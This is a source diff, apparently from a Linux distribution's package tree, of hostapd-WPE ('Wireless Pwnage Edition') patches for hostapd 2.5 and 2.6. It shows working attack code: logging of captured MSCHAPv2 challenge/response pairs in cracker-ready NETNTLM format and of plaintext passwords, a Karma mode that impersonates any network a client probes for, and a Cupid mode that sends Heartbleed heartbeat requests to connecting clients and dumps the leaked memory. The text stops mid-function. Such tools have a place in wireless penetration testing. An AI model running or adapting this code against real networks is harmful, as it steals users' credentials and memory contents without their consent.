+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov
+
+install:
+ @echo Nothing to be made.
diff -rupN hostapd-2.5/src/wpe/wpe.c hostapd-2.5-wpe/src/wpe/wpe.c
--- hostapd-2.5/src/wpe/wpe.c 1970-01-01 01:00:00.000000000 +0100
+++ hostapd-2.5-wpe/src/wpe/wpe.c 2015-10-25 16:52:26.349508655 +0100
@@ -0,0 +1,209 @@
+/*
+ wpe.c -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks that have been modified to some extend.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+
+#include <time.h>
+#include <openssl/ssl.h>
+#include "includes.h"
+#include "common.h"
+#include "wpe/wpe.h"
+#include "utils/wpa_debug.h"
+
+#define wpe_logfile_default_location "./hostapd-wpe.log"
+
+
+#define MSCHAPV2_CHAL_HASH_LEN 8
+#define MSCHAPV2_CHAL_LEN 16
+#define MSCHAPV2_RESP_LEN 24
+
+char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff";
+size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]);
+
+struct wpe_config wpe_conf = {
+ .wpe_logfile = wpe_logfile_default_location,
+ .wpe_logfile_fp = NULL,
+ .wpe_enable_karma = 0,
+ .wpe_enable_cupid = 0,
+ .wpe_enable_return_success = 0,
+ .wpe_hb_send_before_handshake = 1,
+ .wpe_hb_send_before_appdata = 0,
+ .wpe_hb_send_after_appdata = 0,
+ .wpe_hb_payload_size = 50000,
+ .wpe_hb_num_tries = 1,
+ .wpe_hb_num_repeats = 10
+};
+
+void wpe_log_file_and_stdout(char const *fmt, ...) {
+
+ if ( wpe_conf.wpe_logfile_fp == NULL ) {
+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a");
+ if ( wpe_conf.wpe_logfile_fp == NULL )
+ printf("WPE: Cannot file log file");
+ }
+
+ va_list ap;
+
+ va_start(ap, fmt);
+ vprintf(fmt, ap);
+ va_end(ap);
+
+ va_start(ap, fmt);
+ if ( wpe_conf.wpe_logfile_fp != NULL )
+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap);
+ va_end(ap);
+}
+
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t challenge:\t");
+ for (x=0; x<challenge_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",challenge[x]);
+ wpe_log_file_and_stdout("%02x\n",challenge[x]);
+
+ wpe_log_file_and_stdout("\t response:\t");
+ for (x=0; x<response_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",response[x]);
+ wpe_log_file_and_stdout("%02x\n",response[x]);
+
+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {
+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout(":$NETNTLM$");
+
+ for (x=0; x<challenge_len; x++)
+ wpe_log_file_and_stdout("%02x",challenge[x]);
+ wpe_log_file_and_stdout("$");
+ for (x=0; x<response_len; x++)
+ wpe_log_file_and_stdout("%02x",response[x]);
+ wpe_log_file_and_stdout("\n");
+ }
+}
+
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t password:\t");
+ for (x=0; x<password_len; x++)
+ wpe_log_file_and_stdout("%c",password[x]);
+ wpe_log_file_and_stdout("\n");
+}
+
+/*
+ Taken from asleap, who took from nmap, who took from tcpdump :)
+*/
+void wpe_hexdump(unsigned char *bp, unsigned int length)
+{
+
+ /* stolen from tcpdump, then kludged extensively */
+
+ static const char asciify[] =
+ "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";
+
+ const unsigned short *sp;
+ const unsigned char *ap;
+ unsigned int i, j;
+ int nshorts, nshorts2;
+ int padding;
+
+ wpe_log_file_and_stdout("\n\t");
+ padding = 0;
+ sp = (unsigned short *)bp;
+ ap = (unsigned char *)bp;
+ nshorts = (unsigned int)length / sizeof(unsigned short);
+ nshorts2 = (unsigned int)length / sizeof(unsigned short);
+ i = 0;
+ j = 0;
+ while (1) {
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" %04x", ntohs(*sp));
+ sp++;
+ if ((++i % 8) == 0)
+ break;
+ }
+ if (nshorts < 0) {
+ if ((length & 1) && (((i - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp);
+ padding++;
+ }
+ nshorts = (8 - (nshorts2 - nshorts));
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" ");
+ }
+ if (!padding)
+ wpe_log_file_and_stdout(" ");
+ }
+ wpe_log_file_and_stdout(" ");
+
+ while (--nshorts2 >= 0) {
+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]);
+ ap += 2;
+ if ((++j % 8) == 0) {
+ wpe_log_file_and_stdout("\n\t");
+ break;
+ }
+ }
+ if (nshorts2 < 0) {
+ if ((length & 1) && (((j - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout("%c", asciify[*ap]);
+ }
+ break;
+ }
+ }
+ if ((length & 1) && (((i - 1) % 8) == 0)) {
+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp);
+ wpe_log_file_and_stdout(" %c",
+ asciify[*ap]);
+ }
+ wpe_log_file_and_stdout("\n");
+}
+
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) {
+ if (v_content_type == TLS1_RT_HEARTBEAT) {
+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n");
+ v_ssl->tlsext_hb_pending = 1;
+ wpe_hexdump((unsigned char *)v_buf, v_len);
+ }
+}
+
+
+char *wpe_hb_clear() {
+ char *p;
+ // set payload size
+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3];
+ s2n(wpe_conf.wpe_hb_payload_size, p);
+
+ return wpe_hb_msg;
+}
+
diff -rupN hostapd-2.5/src/wpe/wpe.h hostapd-2.5-wpe/src/wpe/wpe.h
--- hostapd-2.5/src/wpe/wpe.h 1970-01-01 01:00:00.000000000 +0100
+++ hostapd-2.5-wpe/src/wpe/wpe.h 2015-10-25 16:52:26.349508655 +0100
@@ -0,0 +1,50 @@
+/*
+ wpe.h -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+#include <openssl/ssl.h>
+
+struct wpe_config {
+ char *wpe_logfile;
+ FILE *wpe_logfile_fp;
+ unsigned int wpe_enable_karma;
+ unsigned int wpe_enable_cupid;
+ unsigned int wpe_enable_return_success;
+ unsigned int wpe_hb_send_before_handshake:1;
+ unsigned int wpe_hb_send_before_appdata:1;
+ unsigned int wpe_hb_send_after_appdata:1;
+ unsigned int wpe_hb_payload_size;
+ unsigned int wpe_hb_num_tries;
+ unsigned int wpe_hb_num_repeats;
+};
+
+extern struct wpe_config wpe_conf;
+
+extern char wpe_hb_msg[];
+extern size_t wpe_hb_msg_len;
+
+//#define WPE_HB_MSG_LEN 8
+
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+ (((unsigned int)(c[1])) )),c+=2)
+
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+ c[1]=(unsigned char)(((s) )&0xff)),c+=2)
+
+
+void wpe_log_file_and_stdout(char const *fmt, ...);
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg);
+char *wpe_hb_clear();

4121
net-wireless/hostapd/files/hostapd-2.6-wpe-r2.patch
View file

File diff suppressed because it is too large Load diff

4194
net-wireless/hostapd/files/hostapd-2.6-wpe-r3.patch
View file

File diff suppressed because it is too large Load diff

2042
net-wireless/hostapd/files/hostapd-2.6-wpe.conf
View file

File diff suppressed because it is too large Load diff

989
net-wireless/hostapd/files/hostapd-2.6-wpe.patch
View file

@ -1,989 +0,0 @@
diff -rupN hostapd-2.6/hostapd/config_file.c hostapd-2.6-wpe/hostapd/config_file.c
--- hostapd-2.6/hostapd/config_file.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/hostapd/config_file.c 2016-12-17 06:12:53.647984078 -0500
@@ -20,7 +20,7 @@
#include "ap/wpa_auth.h"
#include "ap/ap_config.h"
#include "config_file.h"
-
+#include "wpe/wpe.h"
#ifndef CONFIG_NO_RADIUS
#ifdef EAP_SERVER
@@ -2108,6 +2108,20 @@ static int hostapd_config_fill(struct ho
return 1;
}
wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version);
+ } else if (os_strcmp(buf, "wpe_logfile") == 0) {
+ wpe_conf.wpe_logfile = os_strdup(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) {
+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) {
+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) {
+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
+ wpe_conf.wpe_hb_payload_size = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) {
+ wpe_conf.wpe_hb_num_repeats = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) {
+ wpe_conf.wpe_hb_num_tries = atoi(pos);
#ifdef EAP_SERVER
} else if (os_strcmp(buf, "eap_authenticator") == 0) {
bss->eap_server = atoi(pos);
diff -rupN hostapd-2.6/hostapd/hostapd-wpe.eap_user hostapd-2.6-wpe/hostapd/hostapd-wpe.eap_user
--- hostapd-2.6/hostapd/hostapd-wpe.eap_user 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.6-wpe/hostapd/hostapd-wpe.eap_user 2016-12-17 06:12:53.947984072 -0500
@@ -0,0 +1,107 @@
+# hostapd user database for integrated EAP server
+
+# Each line must contain an identity, EAP method(s), and an optional password
+# separated with whitespace (space or tab). The identity and password must be
+# double quoted ("user"). Password can alternatively be stored as
+# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password
+# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means
+# that the plaintext password does not need to be included in the user file.
+# Password hash is stored as hash:<16-octets of hex data> without quotation
+# marks.
+
+# [2] flag in the end of the line can be used to mark users for tunneled phase
+# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous
+# identity can be used in the unencrypted phase 1 and the real user identity
+# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous
+# access is needed, two user entries is needed, one for phase 1 and another
+# with the same username for phase 2.
+#
+# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use
+# password option.
+# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a
+# password.
+# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration.
+#
+# * can be used as a wildcard to match any user identity. The main purposes for
+# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to
+# avoid having to configure every certificate for EAP-TLS authentication. The
+# first matching entry is selected, so * should be used as the last phase 1
+# user entry.
+#
+# "prefix"* can be used to match the given prefix and anything after this. The
+# main purpose for this is to be able to avoid EAP method negotiation when the
+# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This
+# is only allowed for phase 1 identities.
+#
+# Multiple methods can be configured to make the authenticator try them one by
+# one until the peer accepts one. The method names are separated with a
+# comma (,).
+#
+# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP
+# version based on the Phase 1 identity. Without this flag, the EAP
+# authenticator advertises the highest supported version and select the version
+# based on the first PEAP packet from the supplicant.
+#
+# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel.
+# Tunneled EAP methods are configured with standard EAP method name and [2]
+# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP,
+# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a
+# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password
+# hash.
+#
+# Arbitrary RADIUS attributes can be added into Access-Accept packets similarly
+# to the way radius_auth_req_attr is used for Access-Request packet in
+# hostapd.conf. For EAP server, this is configured separately for each user
+# entry with radius_accept_attr=<value> line(s) following the main user entry
+# line.
+
+# Phase 1 users
+#"user" MD5 "password"
+#"test user" MD5 "secret"
+#"example user" TLS
+#"DOMAIN\user" MSCHAPV2 "password"
+#"gtc user" GTC "password"
+#"pax user" PAX "unknown"
+#"pax.user@example.com" PAX 0123456789abcdef0123456789abcdef
+#"psk user" PSK "unknown"
+#"psk.user@example.com" PSK 0123456789abcdef0123456789abcdef
+#"sake.user@example.com" SAKE 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
+#"ttls" TTLS
+#"not anonymous" PEAP
+# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes
+#"0"* AKA,TTLS,TLS,PEAP,SIM
+#"1"* SIM,TTLS,TLS,PEAP,AKA
+#"2"* AKA,TTLS,TLS,PEAP,SIM
+#"3"* SIM,TTLS,TLS,PEAP,AKA
+#"4"* AKA,TTLS,TLS,PEAP,SIM
+#"5"* SIM,TTLS,TLS,PEAP,AKA
+#"6"* AKA'
+#"7"* AKA'
+#"8"* AKA'
+
+# Wildcard for all other identities
+#* PEAP,TTLS,TLS,SIM,AKA
+
+# Phase 2 (tunnelled within EAP-PEAP or EAP-TTLS) users
+#"t-md5" MD5 "password" [2]
+#"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2]
+#"t-gtc" GTC "password" [2]
+#"not anonymous" MSCHAPV2 "password" [2]
+#"user" MD5,GTC,MSCHAPV2 "password" [2]
+#"test user" MSCHAPV2 hash:000102030405060708090a0b0c0d0e0f [2]
+#"ttls-user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS-MSCHAPV2 "password" [2]
+
+# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes in phase 2
+#"0"* AKA [2]
+#"1"* SIM [2]
+#"2"* AKA [2]
+#"3"* SIM [2]
+#"4"* AKA [2]
+#"5"* SIM [2]
+#"6"* AKA' [2]
+#"7"* AKA' [2]
+#"8"* AKA' [2]
+
+# WPE - DO NOT REMOVE - These entries are specifically in here
+* PEAP,TTLS,TLS,FAST
+"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "t" [2]
diff -rupN hostapd-2.6/hostapd/main.c hostapd-2.6-wpe/hostapd/main.c
--- hostapd-2.6/hostapd/main.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/hostapd/main.c 2016-12-17 06:12:53.947984072 -0500
@@ -28,7 +28,7 @@
#include "config_file.h"
#include "eap_register.h"
#include "ctrl_iface.h"
-
+#include "wpe/wpe.h"
struct hapd_global {
void **drv_priv;
@@ -448,11 +448,16 @@ static int hostapd_global_run(struct hap
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd-WPE v" VERSION_STR "\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2016, Jouni Malinen <j@w1.fi> "
- "and contributors\n");
+ "and contributors\n"
+ "-----------------------------------------------------\n"
+ "WPE (Wireless Pwnage Edition)\n"
+ "This version has been cleverly modified to target\n"
+ "wired and wireless users.\n"
+ "Thomas d'Otreppe <@aircrackng>");
}
@@ -461,7 +466,7 @@ static void usage(void)
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd-wpe [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] [-G <group>]\\\n"
" [-i <comma-separated list of interface names>]\\\n"
@@ -486,7 +491,12 @@ static void usage(void)
" -i list of interface names to use\n"
" -S start all the interfaces synchronously\n"
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n\n"
+ " WPE Options -------------------\n"
+ " (credential logging always enabled)\n"
+ " -s Return Success where possible\n"
+ " -k Karma Mode (Respond to all probes)\n"
+ " -c Cupid Mode (Heartbleed clients)\n\n");
exit(1);
}
@@ -661,7 +671,7 @@ int main(int argc, char *argv[])
dl_list_init(&interfaces.global_ctrl_dst);
for (;;) {
- c = getopt(argc, argv, "b:Bde:f:hi:KP:STtu:vg:G:");
+ c = getopt(argc, argv, "b:Bde:f:hi:KP:STtu:vg:G:kcs");
if (c < 0)
break;
switch (c) {
@@ -725,6 +735,15 @@ int main(int argc, char *argv[])
case 'u':
return gen_uuid(optarg);
#endif /* CONFIG_WPS */
+ case 'k':
+ wpe_conf.wpe_enable_karma++;
+ break;
+ case 'c':
+ wpe_conf.wpe_enable_cupid++;
+ break;
+ case 's':
+ wpe_conf.wpe_enable_return_success++;
+ break;
case 'i':
if (hostapd_get_interface_names(&if_names,
&if_names_size, optarg))
diff -rupN hostapd-2.6/hostapd/Makefile hostapd-2.6-wpe/hostapd/Makefile
--- hostapd-2.6/hostapd/Makefile 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/hostapd/Makefile 2016-12-17 06:12:53.955984072 -0500
@@ -86,6 +86,7 @@ OBJS += ../src/ap/beacon.o
OBJS += ../src/ap/bss_load.o
OBJS += ../src/ap/neighbor_db.o
OBJS += ../src/ap/rrm.o
+OBJS += ../src/wpe/wpe.o
OBJS_c = hostapd_cli.o
OBJS_c += ../src/common/wpa_ctrl.o
@@ -1012,7 +1013,7 @@ OBJS += ../src/fst/fst_ctrl_iface.o
endif
endif
-ALL=hostapd hostapd_cli
+ALL=hostapd-wpe hostapd-wpe_cli
all: verify_config $(ALL)
@@ -1051,6 +1052,15 @@ $(DESTDIR)$(BINDIR)/%: %
install: $(addprefix $(DESTDIR)$(BINDIR)/,$(ALL))
+wpe:
+ install -d $(DESTDIR)/etc/hostapd-wpe
+ install -m 644 hostapd-wpe.conf hostapd-wpe.eap_user $(DESTDIR)/etc/hostapd-wpe
+ install -d $(DESTDIR)/etc/hostapd-wpe/certs
+ install -d $(DESTDIR)/etc/hostapd-wpe/certs/demoCA
+ install -m 644 certs/demoCA/cacert.pem $(DESTDIR)/etc/hostapd-wpe/certs/demoCA
+ install -m 755 certs/bootstrap $(DESTDIR)/etc/hostapd-wpe/certs
+ install -m 644 certs/ca.cnf certs/client.cnf certs/Makefile certs/README certs/README.wpe certs/server.cnf certs/xpextensions $(DESTDIR)/etc/hostapd-wpe/certs
+
../src/drivers/build.hostapd:
@if [ -f ../src/drivers/build.wpa_supplicant ]; then \
$(MAKE) -C ../src/drivers clean; \
@@ -1059,15 +1069,15 @@ install: $(addprefix $(DESTDIR)$(BINDIR)
BCHECK=../src/drivers/build.hostapd
-hostapd: $(BCHECK) $(OBJS)
- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
+hostapd-wpe: $(BCHECK) $(OBJS)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe $(OBJS) $(LIBS)
@$(E) " LD " $@
ifdef CONFIG_WPA_TRACE
OBJS_c += ../src/utils/trace.o
endif
-hostapd_cli: $(OBJS_c)
- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
+hostapd-wpe_cli: $(OBJS_c)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe_cli $(OBJS_c) $(LIBS_c)
@$(E) " LD " $@
NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS)
@@ -1114,7 +1124,7 @@ lcov-html:
clean:
$(MAKE) -C ../src clean
- rm -f core *~ *.o hostapd hostapd_cli nt_password_hash hlr_auc_gw
+ rm -f core *~ *.o hostapd-wpe hostapd-wpe_cli nt_password_hash hlr_auc_gw
rm -f *.d *.gcno *.gcda *.gcov
rm -f lcov.info
rm -rf lcov-html
diff -rupN hostapd-2.6/src/ap/beacon.c hostapd-2.6-wpe/src/ap/beacon.c
--- hostapd-2.6/src/ap/beacon.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/ap/beacon.c 2016-12-17 06:12:53.955984072 -0500
@@ -30,7 +30,7 @@
#include "hs20.h"
#include "dfs.h"
#include "taxonomy.h"
-
+#include "wpe/wpe.h"
#ifdef NEED_AP_MLME
@@ -817,6 +817,13 @@ void handle_probe_req(struct hostapd_dat
}
#endif /* CONFIG_TAXONOMY */
+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) {
+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len));
+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len);
+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
res = ssid_match(hapd, elems.ssid, elems.ssid_len,
elems.ssid_list, elems.ssid_list_len);
if (res == NO_SSID_MATCH) {
diff -rupN hostapd-2.6/src/ap/ieee802_11.c hostapd-2.6-wpe/src/ap/ieee802_11.c
--- hostapd-2.6/src/ap/ieee802_11.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/ap/ieee802_11.c 2016-12-17 06:12:53.955984072 -0500
@@ -45,7 +45,7 @@
#include "mbo_ap.h"
#include "rrm.h"
#include "taxonomy.h"
-
+#include "wpe/wpe.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -1418,8 +1418,8 @@ static u16 check_ssid(struct hostapd_dat
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
HOSTAPD_LEVEL_INFO,
"Station tried to associate with unknown SSID "
diff -rupN hostapd-2.6/src/crypto/ms_funcs.h hostapd-2.6-wpe/src/crypto/ms_funcs.h
--- hostapd-2.6/src/crypto/ms_funcs.h 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/crypto/ms_funcs.h 2016-12-17 06:12:53.955984072 -0500
@@ -9,6 +9,10 @@
#ifndef MS_FUNCS_H
#define MS_FUNCS_H
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge,
const u8 *username, size_t username_len,
const u8 *password, size_t password_len,
diff -rupN hostapd-2.6/src/crypto/tls_openssl.c hostapd-2.6-wpe/src/crypto/tls_openssl.c
--- hostapd-2.6/src/crypto/tls_openssl.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/crypto/tls_openssl.c 2016-12-17 06:16:43.435979728 -0500
@@ -21,6 +21,7 @@
#include <openssl/opensslv.h>
#include <openssl/pkcs12.h>
#include <openssl/x509v3.h>
+#include <openssl/rand.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif /* OPENSSL_NO_ENGINE */
@@ -37,6 +38,7 @@
#include "sha256.h"
#include "tls.h"
#include "tls_openssl.h"
+#include "wpe/wpe.h"
#if !defined(CONFIG_FIPS) && \
(defined(EAP_FAST) || defined(EAP_FAST_DYNAMIC) || \
@@ -179,6 +181,8 @@ static int tls_add_ca_from_keystore_enco
#endif /* ANDROID */
+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top
+
static int tls_openssl_ref_count = 0;
static int tls_ex_idx_session = -1;
@@ -1347,7 +1351,10 @@ struct tls_connection * tls_connection_i
conn->context = context;
SSL_set_app_data(conn->ssl, conn);
- SSL_set_msg_callback(conn->ssl, tls_msg_cb);
+ if (wpe_conf.wpe_enable_cupid)
+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb);
+ else
+ SSL_set_msg_callback(conn->ssl, tls_msg_cb);
SSL_set_msg_callback_arg(conn->ssl, conn);
options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 |
SSL_OP_SINGLE_DH_USE;
@@ -3255,8 +3262,10 @@ static struct wpabuf *
openssl_handshake(struct tls_connection *conn, const struct wpabuf *in_data,
int server)
{
- int res;
+ int res,i;
struct wpabuf *out_data;
+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2;
+
/*
* Give TLS handshake data from the server (if available) to OpenSSL
@@ -3316,6 +3325,25 @@ openssl_handshake(struct tls_connection
}
wpabuf_put(out_data, res);
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) {
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n");
+ wpe_hb_ptr1 = NULL;
+ for (i=0; i < wpe_conf.wpe_hb_num_repeats; i++) {
+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1);
+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1);
+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1);
+ if (wpe_hb_ptr1) {
+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2);
+ } else {
+ wpe_hb_ptr1 = wpe_hb_ptr2;
+ }
+ }
+ conn->ssl->tlsext_hb_pending = 1;
+ wpe_conf.wpe_hb_num_tries--;
+ return wpe_hb_ptr1;
+ }
+
return out_data;
}
@@ -3431,6 +3459,10 @@ struct wpabuf * tls_connection_encrypt(v
tls_show_errors(MSG_INFO, __func__, "BIO_reset failed");
return NULL;
}
+
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata)
+ wpe_hb_enc(conn);
+
res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data));
if (res < 0) {
tls_show_errors(MSG_INFO, __func__,
@@ -3438,6 +3470,10 @@ struct wpabuf * tls_connection_encrypt(v
return NULL;
}
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata)
+ wpe_hb_enc(conn);
+
+
/* Read encrypted data to be sent to the server */
buf = wpabuf_alloc(wpabuf_len(in_data) + 300);
if (buf == NULL)
@@ -4331,3 +4367,67 @@ void tls_connection_remove_session(struc
wpa_printf(MSG_DEBUG,
"OpenSSL: Removed cached session to disable session resumption");
}
+
+int wpe_hb_enc(struct tls_connection *conn) {
+ unsigned char *cbuf, *p;
+
+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */
+ unsigned int padding = 16; //default: 16 /* Use minimum padding */
+
+ if (!SSL_is_init_finished(conn->ssl)) {
+ return -1;
+ }
+
+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n");
+ } else {
